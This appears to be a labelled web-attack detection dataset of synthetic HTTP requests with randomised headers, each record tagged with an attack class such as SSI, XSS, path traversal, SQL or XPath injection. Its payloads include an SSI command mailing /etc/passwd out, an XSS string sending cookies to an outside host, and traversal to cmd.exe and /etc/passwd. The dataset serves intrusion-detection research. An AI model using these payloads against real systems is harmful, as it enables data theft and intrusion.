Date: Wed, 12 Nov 08 09:14:23 CET
ETag: W/"A4SSBwZMlSj3m58HF"
Expect: iVjhs
From: f4re3ea2@HiNl.uk
If-Modified-Since: Thu, 06 Sep 07 10:19:29 UTC
If-Unmodified-Since: Mon, 16 Nov 09 24:45:10 UTC
If-Match: "5rbpVrWJbc3L6sdV"
If-None-Match: "tIp05M.7R5.ZKjsc8_"
If-Range: "Mmyq6Sbv1F@FhSuoXr"
Max-Forwards: 02
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest cnonce="e4hha"
Range: -709
Referer: http://hEe9c.gov/cif8o6/t5rl/bmnSgE7d/ecssi4in/revQtsw.pl
TE: gzip;q=0.9,trailers,gzip
Trailer: Accept
User-Agent: usseaneegan0Re2
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4708x895
Via: eiRhsy/4.5 www.pfttsf.html
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 204.138.194.99
X-Serial-Number: 079212958544590509
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45599
Start - Id: 39905
class: SSI
PUT /ozaIulDc3/nj@LfYZlb6GsnsP@vSiT/6e0me6s8t/neh/sMDUlErS2b/rR6pK2KxOCrmVHGIV4wd/hUG5/njlh6Tr2SkgzK-BIu5k/p9D3r.gif? HTTP/1.1
Content-Length: 332
Content-Language: ntDaLl
Content-Encoding: compress
Content-Location: http://obitRir.st/C2etml.shtml
Content-MD5: YzRhaHRhc2Z0c3JYU0hraQ==
Content-Type: application/x-www-form-urlencoded
Host: 218.27.239.102:64
Connection: keep-alive
Accept: video/*
Accept-Charset: x-mac-hebrew;q=0.8, iso-8859-3;q=0.0, cp-932;q=0.5
Accept-Encoding: 
Cache-Control: min-fresh=9
Cookie2: $Version="47"
Date: Tue, 04 Mar 08 03:36:23 CET
ETag: "LcgSnpA@w-i3zxL9"
Expect: h0il
From: etiwhOvt@03yWr.net
If-Modified-Since: Sun, 15 Jul 07 11:15:58 CET
If-None-Match: "PBVMrOOMjjLjSYk1WDy"
If-Range: Sun, 22 Aug 04 22:00:24 UTC
Max-Forwards: 3134
Pragma: somwhedR='ieylseR'
Authorization: Digest cnonce="DmWeetx"
Referer: /rF1mapn/aptcmnn.cfm
Trailer: If-Modified-Since
User-Agent: sY4UnwfIO http://www.oEnhwoG.biz

o3=y3rUUwy&pp9esdiniasns4d=89351937&.J53rm1boot.inicS=112&i3r=9483495&documentCciilinkFT=<!--    #exec     cmd="/bin/mail prpaaeElae.com   < /etc/passwd"-->&mqnd7herwf34=8088279&qtolpE=mnSz1ttoaiwm6TH1iuoM&hjs7tst=878794415&eresbtttAk=6ben4Uerthpr0e8&uopi0eDnerdEo=rw&ioaI=hEn&ucntlip8egnju=410169&fQkjEIJ=oa

End - Id: 39905
Start - Id: 40359
class: SSI
GET /nHdi5lMYTWlo/Btenaa4ohcrk13a0o/edIer/eJmE28/8eaga/gknenyod0aedetc/pVaN.Z17D3Nu7tHCvM/yJq54uW/qzBVppgQHXlc/o.C9bS3Ci48QcrV5kNGA.cgi?jp=dnFxUVql&tep5oilodreorea=etitsaSfaa&tguTndhet=479689&c4AsgFvnA9=auQCwvY&LtE8o=12033&gS=dht4optal+ct%7C&mi0rzegsae3=6822881969&O9e=84&ab=0034&la=a%3Aw&tHdnZb0=adhtobersystem%3Bbuzn HTTP/1.0
Host: 72.42.88.13
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: <!--     #include    virtual="c:\winnt\system.ini"    -->
Accept-Language: *;q=0.3
Cache-Control: max-age=92
Client-ip: 212.157.216.158
Cookie: IuiEu=17766;mhFenn1Efmde=0tnralselslb;a1=eJJ6f
Cookie2: $Version="4"
Date: Fri, 04 Mar 05 04:48:31 UTC
ETag: "Rx_E-BR84jvDVoRCBf"
Expect: dyooSh0e
From: oanbTeu@nttoV.net
If-Modified-Since: Fri, 21 Jul 06 22:05:08 CET
If-Unmodified-Since: Sun, 11 Jan 09 09:23:45 GMT
If-Match: "ypBuvIZh.2cFFVP@0GRc"
If-None-Match: "XTf85CCVPfEVaN@1Q4Ro"
If-Range: Sun, 01 Feb 09 13:05:30 GMT
Max-Forwards: 23
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic RHJkOTp5dGFyNG8=
Range: -62942,193769-
Referer: http://www.Nrrmd.fr/telets/biehera6.avi
TE: chunked;q=0.5
Trailer: Referer
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 8.2; sa-oL; rv:5.8.7) Gecko/45444108
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Pixels: 7186x8117
Via: 7.6 161.93.150.224
Transfer-Encoding: gzip
Upgrade: fwr/8.8, o6abt/9.6
Warning: 214 www.ioarta.gif "t2kbllTyjTr61loIramt" "Sun, 01 Jul 07 21:32:40 UTC"
X-Forwarded-For: 76.58.9.70
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40359
Start - Id: 46881
class: XSS
POST /lK2f-_GtsogyfVJ/relcs8eiue4stdhhh7/rled8ldauGhorzoxnnne/t63kyfd/mBK.qtFAkH-8lMFBXty/varyLzKfW/wg3dEJpkUK/H2wwget.dll? HTTP/1.0
Content-Length: 230
Content-Language: nhEe,yuRi
Content-Encoding: gzip
Content-Location: http://uiea.uk/t9Nmd/ni2iFes.php3
Content-MD5: YWplZGU2YWhya3JwbXNoNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Nov 06 10:27:09 UTC
Last-Modified: Mon, 25 Sep 06 14:12:26 GMT
Host: 206.1.28.150
Connection: close
Accept: image/*;q=0.6, image/*
Accept-Charset: *
Accept-Encoding: identity;q=0.2
Accept-Language: mu-l0c;q=0.2, FAu-cnmy
Cache-Control: no-store
Client-ip: 152.184.163.84
Cookie: alaTm=0851242;R@WulikeK=tt;soLwi=i-pGtHU;sEdokeOue5on=crsepSeo>tnph-teh
Cookie2: $Version="8"
Date: Sun, 30 Mar 08 18:44:30 GMT
ETag: W/"HWqqqDJevjUbS.ZrE"
Expect: eimHsos=aoe09mew;tEeut=cmfm
From: xorersew@0i1thu.fr
If-Modified-Since: Tue, 17 Nov 09 12:30:38 CET
If-Unmodified-Since: Sat, 03 Apr 04 02:59:33 UTC
If-Match: *
If-None-Match: "cB3ebdaEj-Wo8XLHUN"
If-Range: *
Max-Forwards: 165
MIME-Version: 8.9
Pragma: ngfks9='mlj'
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest qop=auth
Range: -122
Referer: http://Xtb169nD.st/y6l7o/ionq/nItsc.php
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: nfcophde3 (dbO3m1nH..; hvjlM_.; a8f9S-n)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 1.2 www.daOrgscw.tiff:2, s4iyo/1.3 249.164.153.118, 0.1 41.12.15.67
Transfer-Encoding: deflate
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------
~~~~~: ~~~~~~~~~~~

shbwroegslj=349386&zere=643937835&tae4nlnjrzbhEe=<link   rel    =  "  stylesheet    " href  ="    javascript: [alert  ('e0sawbteo');]"   >&amsA=Eiiqw&rTmNhyNnt=a&nlinhvB=678020&kDIj=sbl)&uoa=49423

End - Id: 46881
Start - Id: 44843
class: PathTransversal
GET /4a5ei9tyenlttTmN/cq/lsY71htpass/qpnnsuhosloi/tbhrnAAoa7goiiReyi/5mdGUineBm6tp/ypBWfusr/oFKCgnY.C8GVb4a/t6_Ep/e9o.gif?n5taasnpmeali=ai&AhEpombox9l0=ml_nG0uh_EJ&Tcfeew=..%2F..%2F..%2Fastele%2Fadmin.txt HTTP/1.1
Host: www.WsRon.biz
Connection: 1tmqiao0
Accept: video/*, video/quicktime;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.3
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 55.4.250.85
Cookie: fOlinkWG3meta6Y= uutnn;qtG6Br4nQ7M9=22M8_p9oUl
Cookie2: $Version="393"
Date: Wed, 06 Jun 07 15:00:07 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 07 Jun 09 21:51:29 UTC
If-Unmodified-Since: Tue, 28 Jul 09 18:50:35 UTC
If-Match: *
If-None-Match: "8spgIl6Vt8rYwmzm"
If-Range: "7m92WvJ16gwqmaoLa6f"
Max-Forwards: 87
MIME-Version: 8.7
Pragma: N='eoa'
Proxy-Authorization: NTLM bmp3dmpkc29uMHRlZnJvSHVhc25odGNQc2ludGwzb05DdDExc3Rjb2k=
Authorization: NTLM cTNzbnRUZWV0YnhyYTd0dXY2bm1zZTNnc2htaWVybnJleFRyc3RvcnJv
Range: 47909-613115,-508364
Referer: /ysustnmn/nzoml/4alulEru/eeer.txt
TE: chunked,trailers,chunked;q=0.3
Trailer: From
User-Agent: 3fcwxa2irSot4u
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 2.5 127.214.120.94
Transfer-Encoding: deflate
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 083276
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44843
Start - Id: 44388
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.mqlertt.uk:80
Connection: ejbkoo
Accept: video/mpeg;q=0.3
Accept-Charset: x-mac-roman;q=0.9, euc-kr;q=0.9, windows-1250;q=0.6, x-mac-cyrillic
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 25.151.126.170
Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="962"
Date: Mon, 19 Oct 09 04:45:04 GMT
ETag: W/"obTbaYx6BR7gH4UQQTN9"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Tue, 16 Jan 07 18:40:37 CET
If-Unmodified-Since: Sat, 14 Oct 06 12:43:03 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Apr 10 24:21:18 CET
Max-Forwards: 011
MIME-Version: 1.4
Pragma: T='idt'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: reaau nVcu3=rcmfHHh
Range: -843519
Referer: http://www.Aeuoent.it/utbirpwq/HhaY/9ssoo/naueenry.msf
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 9.3; o9-rs; rv:9.2.4) Gecko/02376032
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8335x3340
Via: 1.6 www.tTimtswn.tiff, HTTP/5.2 84.182.166.38
Transfer-Encoding: gzip
Upgrade: sltIe/4.5, 7smi/8.6, fir/0.7
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44388
Start - Id: 49260
class: XPathInjection
GET /beeO/isahsi1ow/luLuJPXM-/Xf2ByRoQM/fh/nhanfel1hl3eH5tsb/Eyiao1hiia.exe?mL1qYBQ8.J7=cdd%27++++or+++++%28i+++%3C++count%28ilshiD%2Fchild%3A%3Atext%28%29%29+and+++++j+++%3C+++count%28s8aate%2Fchild%3A%3Acomment%28%29%29+and++k+++++%3C+count%28aix%2Fchild%3A%3A*%29+++%29+++or+++++%27dnis3%27%3D+++%27+++nefue8%27+++or&@Xlre=7694 HTTP/1.1
Host: www.itario9.biz:9
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 164.16.9.167
Cookie: _CYgxs=2;eIC1=e2WDLt;Yraon=8;m1gg=ftB;ds8pare74kdsed=6QvN3
Cookie2: $Version="395"
Date: Sat, 12 May 07 01:11:35 CET
ETag: W/"jGu3szARAyYEzvM"
Expect: wtti
From: lqie@4vraituc.com
If-Modified-Since: Wed, 18 Nov 09 03:55:34 GMT
If-Unmodified-Since: Sat, 02 Jan 10 11:49:31 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Dec 06 11:45:18 UTC
Max-Forwards: 379
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: NTLM Z0kwaXNybmFwY0RzZXJ0ZXQ5YWVubnRudGV6b3NtaGxlY2RlZTMxb2NMNw==
Range: 560-83908
Referer: http://www.Ftmf6Rlr.com/cnnrwmk/c6cisAh/qwodig/shqlmu.mp3
TE: gzip;q=0.5
Trailer: TE
User-Agent: 14dNn/8.1.1.5.5
UA-CPU: x86
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 666x0440
Via: 4.5 159.216.184.16, 6.0 164.19.24.113, 3.6 78.61.205.214
Transfer-Encoding: gzip
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 499 41.174.135.222 "no1hbieoekpoibdw" "Wed, 22 Dec 04 11:45:31 UTC"
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49260
Start - Id: 48664
class: XPathInjection
POST /euTriOyA46JGsPLE8.oU/zld/c4j2rzobjectlBD/EtrOhr/m92DB3L3znrC@.dll? HTTP/1.0
Content-Length: 132
Content-Language: nNeglO0n
Content-Encoding: identity
Content-Location: /0stT1.mspx
Content-MD5: cG5tbzhubzVOdGRvcGhycw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Dec 04 22:52:15 CET
Last-Modified: Wed, 14 Dec 05 16:26:41 CET
Host: 127.224.163.232
Connection: close
Accept: text/*, audio/x-wav, audio/*;q=0.4
Accept-Charset: x-mac-roman;q=0.1, windows-1254, euc-cn;q=0.4, hz-gb-2312
Accept-Encoding: gzip;q=0.3, identity, identity;q=0.5, compress;q=0.7, deflate
Accept-Language: *
Cache-Control: max-stale=90
Client-ip: 125.212.241.80
Cookie: safeenaii=85801;no4qt=032984;1ojoyp='8;0at4ae=]eelL>eMaac;snh5ou=tLCN3r8wM
Cookie2: $Version="57"
Date: Wed, 25 Feb 09 13:56:48 CET
ETag: W/"Ff7CQIEnCa6LgQAHq"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Thu, 13 Oct 05 23:37:38 GMT
If-Unmodified-Since: Thu, 16 Apr 09 05:33:43 GMT
If-Match: *
If-None-Match: *
If-Range: "Dq@hqaIle13M7L2QGj@-"
Max-Forwards: 2
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM cXRpQWFnd2NlemgwdjBhZXNsaWRzc3NvZWV0MmVveW5sbg==
Authorization: Digest nonce
Range: 12-
Referer: http://www.sah3lt.gov/9iezpwi/uooiAmin/tfNdOt/ehctEgoh.cfm
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: wei2aeQn (38pc@6ZEQm; 2ltp1t; a8HBTO5pFk; areGNoM4P)
UA-CPU: x86
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 5.7 www.5cldeueu.shtml
Transfer-Encoding: 75ipd; dwidtOt=nElnan
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 456 136.21.126.138:79216 "9ErN6ntiDgwn" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 9550547356245150782
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

nhttn0z=6&et0wd=lc2&apdtiittee7nhe=889  or  mc/raA/n/child::node()[position()=202]     or   08003=&cSUp=08

End - Id: 48664
Start - Id: 47061
class: XSS
GET /vIKps/tyMrsdusaevieio/iG1WUWz7Li/oK_Xi3_/ea9f7csaafd/drVBt46C7-62jj/e4oFjgfM.mdb?hriexsntxfm=8s&apoeaImTolrEAi=038686&o0lokdfdemzes=928&efyA8cz2=cete&cfrereso=imeb66tsax%7Cnrs6la2&eeltyaTaydm=%5C%3Ftn8&ilon1ie0isoe5=%27cda%3DRew%2B5%29m%26c&Tsure=o0hetns&5taeaelsPE=nH%405xMfdxZD3&nodeT=ryShe&zInBWr=le0aadminb9ls&jsbb=i.w7RFg3z&nedrpr5iAni=394&PnTTZXLeO=%3Cbgsound++src%3D+++%22+javascript%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.tosi.com%2Fcgi-bin%2Ftina.cgi%27%2Bdocument.cookie%29%3B%5D+%22++%3E&mui0se=2565034 HTTP/1.0
Host: 162.180.220.243:80
Connection: eonx0t
Accept: audio/basic
Accept-Charset: windows-1253
Accept-Encoding: deflate;q=0.4, gzip;q=0.3, identity;q=0.1, deflate;q=0.7, deflate;q=0.4
Accept-Language: sdE-mWOshTNv, rl3q-lsqh7, vhtEr-q7nuchfG
Cache-Control: no-cache
Client-ip: 127.63.46.215
Cookie: j3saot=oocxsnSisohn3T
Cookie2: $Version="08"
Date: Sun, 26 Dec 04 24:50:59 CET
ETag: W/"kR45JZ_ktO5@vv_3fZ"
Expect: 100-continue
From: upMalngr@beooie.cz
If-Modified-Since: Tue, 21 Mar 06 15:13:26 CET
If-Unmodified-Since: Tue, 13 May 08 01:00:36 UTC
If-Match: "h4JzSI9EN93fI6G58g"
If-None-Match: *
If-Range: "@7zCEbRjjE36qvoYnh"
Max-Forwards: 661
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 53-8432
Referer: http://www.bt9zU.cz/wetpmst/arsoka/LIt1oee/eyhm.rar
TE: trailers,gzip;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/2.5 (X11; U; Linux i586 5.5; Ss-5C; rv:6.5.3) Gecko/54745763
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 987x1282
Via: 1.2 63.32.107.4
Transfer-Encoding: identity
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 59.196.39.49
X-Serial-Number: 9140776636485
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47061
Start - Id: 46275
class: PathTransversal
GET /ihn9teemdr58i/udeSaUlS/I1-B9qiGYJpositionautoexec/5bselect727UTprocessing-instructioncatc8W4G/uA0eTVDHtRAto1cCcY2/taVhE47k-VW_/cuoqn4lRDUe.V/bGwmho.shtml?kie=56&tiajjj0Ae=849&orovLii26b=389&d6ern7kw9vu7=rzurohheSh&limprnnmsddu3s=dtnofr+6aysitr%27&oixwdetz3pgfzse=saziwtgu&t9tm5mw7t2a=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&opDu4Iaeh=70&edlaqneum=l+epohm HTTP/1.1
Host: 121.34.103.164
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=8154
Client-ip: 131.126.28.0
Cookie: aa35awmAuf1hpsi=lTeiif6+e;ttirm=wbiuetlocationEtty ;yeeeao3tkhgio=g5qz;jsddctn=e%r5t%ciaE2fHt>ohu>u
Cookie2: $Version="92"
Date: Fri, 27 Feb 04 04:49:32 GMT
ETag: W/"HnKH5rAh5ToK.q6tEPiQ"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Fri, 08 Oct 04 16:47:00 CET
If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: *
If-None-Match: "54kfeWJLFiYYWtUP2f"
If-Range: Wed, 06 Jun 07 12:10:01 UTC
Max-Forwards: 0680
MIME-Version: 8.9
Pragma: qrm=Dogo
Proxy-Authorization: NTLM dHRqZWRFSzNkcmF0Y2ltNXR0YW10ZzhmbHpuNWRuZGFJc2hlaQ==
Authorization: Basic ZW5uaWV6eGM6YW9oMG5reA==
Range: -99,17-4389
Referer: /uue2avsd/hrtxph/adqd/filn.wav
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: aewdam/4.3.2.8
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.1 www.n8aoOe.gif
Transfer-Encoding: compress
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 124.228.151.182
X-Serial-Number: 1060683
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46275
Start - Id: 49166
class: XPathInjection
GET /s8hO9reez8byWhegtN/iy/AH/ejlW5fEzv823TsqEn.tiff?RTaFxlR=8468&Uprocessing-instructioneval.NGGGq=feyGateeotuto4&ta=+tT%3B&WBaconnect_kWvarFlqw=5586+++or+eo%2Ftm%2Fate%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D227%5D+or+++++94297%3D&atOr4keE=475391777&rGeagpt=74241&3XSxf8=osrhd&cVQ9=exech%29y&s5Nscript=re&kuUetcM=e+nahrEnre%7Cs&p3CdSsYacucw=295987&5o4noecuo=xN.__ HTTP/1.0
Host: 15.153.164.232
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=79152
Client-ip: 38.175.250.11
Cookie: oehS=neTchIntcaixartmy;2dnhteeee6Yrp=0;w2et= eat
Cookie2: $Version="2"
Date: Sun, 12 Jun 05 01:10:06 GMT
ETag: W/"VjavY-udlIsPEF8K8Bw"
Expect: 100-continue
From: esgt1xrh@tidc.com
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Sun, 26 Feb 06 16:55:27 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 16 May 07 15:04:46 GMT
Max-Forwards: 76
MIME-Version: 5.8
Pragma: asNhrer=iieaOah5
Proxy-Authorization: Digest response="D8e20478C93A7Ab8Ac2895c940EBEbcd"
Authorization: ptad c8aietA=roddisd
Range: -441207,31726-,-3
Referer: /ifEhkes/SAstt/esee/e7vi/biadizcp.jpg
TE: trailers,trailers,deflate;q=0.6
Trailer: If-Range
User-Agent: Mozilla/1.5 (Machintosh; U; PPC 4.3; ue-4s; rv:5.0.5) Gecko/90247120
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 290x3654
Via: 9.4 www.twQntldn.gif
Transfer-Encoding: deflate
Upgrade: rMm/8.7
Warning: 291 113.152.215.252 "6unhh" "Fri, 21 Oct 05 09:21:56 GMT"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 832866
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49166
Start - Id: 42455
class: SqlInjection
GET /oG8VqzSsrUlcpw/eweetnsyu4Nrie0/iM63EJDmYzK/oVUdC9Q1XRfyo2.sI/ahhn/enDine1p2pe6e/shbbncas/Z5sL.html?ldp5Ofetql0EhY=3nzmoyoigrnru&MUXe8=e6TV6bHFr&colz=9&1PApKZImBORf=lsfbejtteOhoh9eiemhe&n9Zbmm4hrxnrnkf=e1qE1J&htCaoit=9553364&phnnr3g4=%27+++group+++++by+++users.id++having+++010%3D010&aeuv=hjeendeletee0Ae&tsequh=p8B46voED.J&U1tWmcAT=irlruieseo&j8G6=atlUzu&7UG.Sr=26292&3anq=3pah&srcpcatk=nrd4chE3gcenio HTTP/1.1
Host: 117.243.28.30:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=5098
Client-ip: 236.100.11.99
Cookie: yb1ainktehaf=100062;icbetnr=dine;scriptchSLv5BlikeNNf=niai;Omic=iell5Lso-
Cookie2: $Version="3"
Date: Fri, 10 Aug 07 07:23:31 CET
ETag: "W_pGPuGCgS2Zu3QGUSai"
Expect: 100-continue
From: Oselc@mtgpaa.net
If-Modified-Since: Tue, 22 Feb 05 20:28:22 UTC
If-Unmodified-Since: Sat, 04 Nov 06 19:57:21 CET
If-Match: *
If-None-Match: ".FS959iE-.JQYRtFU99"
If-Range: "7HkNEEcKMGZeWhGT"
Max-Forwards: 5632
MIME-Version: 0.2
Pragma: xsti04='eeneL'
Proxy-Authorization: Digest realm
Authorization: Basic ZmU2b3NpZW46bmJwdDdlMw==
Range: 6369-,501-7998
Referer: /6qGef/pgusb/uTal/lnsEshpt.php
TE: trailers,deflate;q=0.1,trailers
Trailer: If-Unmodified-Since
User-Agent: nrtr/3.9.4
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: 1.2 www.ooeaeud.png, 9.3 156.192.8.192, bsts/4.9 www.snPinek.tiff:2
Transfer-Encoding: compress
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 574567754776356
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42455
Start - Id: 41364
class: SqlInjection
PUT /ssGfhHh0zdUez/rP8BxqLn/vrc9cte8.jpeg? HTTP/1.0
Content-Length: 152
Content-Language: rsa,mts
Content-Encoding: identity
Content-Location: /njarmE3t.swf
Content-MD5: ZWdkZWxTU280RHdybmFtOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Apr 09 05:37:39 CET
Last-Modified: Sun, 29 Mar 09 04:42:00 CET
Host: 79.97.133.15
Connection: close
Accept: */*;q=0.8
Accept-Charset: cp-936;q=0.9, windows-1254
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 200.4.215.226
Cookie: nsndfebcapi=01517941;RQI.=nhicognnsa
Cookie2: $Version="620"
Date: Sat, 29 Jul 06 11:17:39 UTC
ETag: W/"J_IZ-Sru.NlxdAHqGD"
Expect: 100-continue
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Thu, 26 Feb 09 02:11:47 UTC
If-Match: "SWFru0JFVzrFD92"
If-None-Match: *
If-Range: "RNv@t1doaOCA6mlkV4U"
Max-Forwards: 11
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: slrj iSieor=iOaoa
Referer: http://www.tuTsent.uk/vaa4.dll
TE: trailers
Trailer: Connection
User-Agent: Mozilla/4.7 (X11; U; Linux i586 1.9; i8-oU; rv:0.8.5) Gecko/10325528
UA-Disp: 557,1073,8
UA-OS: Windows 98
UA-Color: color32
Via: 9.7 129.117.251.55:96324, stwN/6.7 119.26.188.85
Transfer-Encoding: identity
Upgrade: nhetgd/3.9
Warning: 522 63.253.58.196 "esHrot6irna" 
X-Serial-Number: 309660
----: ------------------------------------

eNNe=uhCq1-L80r&useio=ssiztoff4itdoNC&e4npeqxe0Hnt1u=hDQhp&NiRrkNouym=    OR   2  >     1&aow7lkaioato=9&e1=doUaseRR&qdinhaaHsnS=3194&fnIiN7=osrrEAeyw

End - Id: 41364
Start - Id: 39095
class: LdapInjection
POST /ohoesjiibB8/7yg7WpLq4lI2ASHR/updateGv7ec52_hS7tb/eah9/iiAnGUP8K1AG2Qx/aSt0H1idhhn/ltQHe/dDc3najNrd0DO_UA.YSG/dhtpassKHEW6X7gH/sF8A/HxQTUrfL.gif? HTTP/1.0
Content-Length: 115
Content-Language: rnahwoe
Content-Encoding: identity
Content-Location: /EWa2pd/st5Id.aspx
Content-MD5: b3Jlc3JuTmF3dGhCdmxIbg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Jan 05 23:48:23 CET
Last-Modified: Mon, 26 Jan 09 14:52:50 UTC
Host: 155.6.12.49
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad, windows-1252
Accept-Encoding: 
Accept-Language: h7hd5e-aolcst, 8sib-0g81seS, ie-epclrCN;q=0.9, e33ufl-6ts4tfs
Cache-Control: no-transform
Client-ip: 143.153.115.113
